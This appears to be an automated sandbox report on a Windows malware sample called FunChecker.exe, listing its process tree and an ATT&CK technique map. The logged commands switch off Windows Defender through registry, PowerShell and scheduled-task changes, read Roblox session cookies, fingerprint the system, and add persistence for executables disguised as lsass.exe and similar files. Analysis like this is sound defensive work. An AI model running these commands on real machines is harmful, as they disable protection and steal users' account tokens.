PID 3684 wrote to memory of 4116	3684	cmd.exe	103
PID 3684 wrote to memory of 4116	3684	cmd.exe	103
PID 3684 wrote to memory of 4668	3684	cmd.exe	104
PID 3684 wrote to memory of 4668	3684	cmd.exe	104
PID 3684 wrote to memory of 3080	3684	cmd.exe	105
PID 3684 wrote to memory of 3080	3684	cmd.exe	105
PID 3684 wrote to memory of 2440	3684	cmd.exe	106
PID 3684 wrote to memory of 2440	3684	cmd.exe	106
PID 3684 wrote to memory of 4080	3684	cmd.exe	107
PID 3684 wrote to memory of 4080	3684	cmd.exe	107
PID 3684 wrote to memory of 488	3684	cmd.exe	108
PID 3684 wrote to memory of 488	3684	cmd.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\FunChecker.exe
"C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1676
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:600
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:2172
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:3348
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4868
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:424
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2972
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2216
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:1912
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:1936
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:4404
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:524
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2760
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2108
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:4116
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:4668
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:3080
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2440
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4080
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:488
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:3408
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:404
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:2096
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    - Modifies registry class
    PID:2420
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4980
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2104
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1676
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
  2⤵
  PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "
  2⤵
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2968
- C:\Users\Admin\AppData\Local\Temp\system32.exe
  "C:\Users\Admin\AppData\Local\Temp\system32.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Checks whether UAC is enabled
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4356
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4332
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4116
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4972
- C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
  "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:664
- C:\Users\Admin\AppData\Local\Temp\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:4016
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3684
- - C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe
    "C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4424
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "HPN42SDD8UHTLWI" /tr "C:\Users\Admin\AppData\Roaming\HPN42SDD8UHTLWI.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2000
- - C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe
    "C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    PID:4912
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
      4⤵
      PID:3876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
        5⤵
        
        PID:3684
      - C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
        
        "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        Modifies registry class
        
        PID:664
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kleghtlu\kleghtlu.cmdline"
        7⤵
        
        PID:4680
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71D0.tmp" "c:\Users\Admin\AppData\Roaming\CSCF6D6BC8FAF0144D5922F1843B23DA98E.TMP"
        8⤵
        
        PID:4520
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilftiht0\ilftiht0.cmdline"
        7⤵
        Drops file in System32 directory
        
        PID:4484
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES721E.tmp" "c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP"
        8⤵
        
        PID:4956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\InstallAgent.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2572
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\31rB2fmfHH.bat"
        7⤵
        
        PID:3180
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:1940
        
        C:\Recovery\WindowsRE\dwm.exe
        
        "C:\Recovery\WindowsRE\dwm.exe"
        8⤵
        Executes dropped EXE
        
        PID:2044

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 13 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 5 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion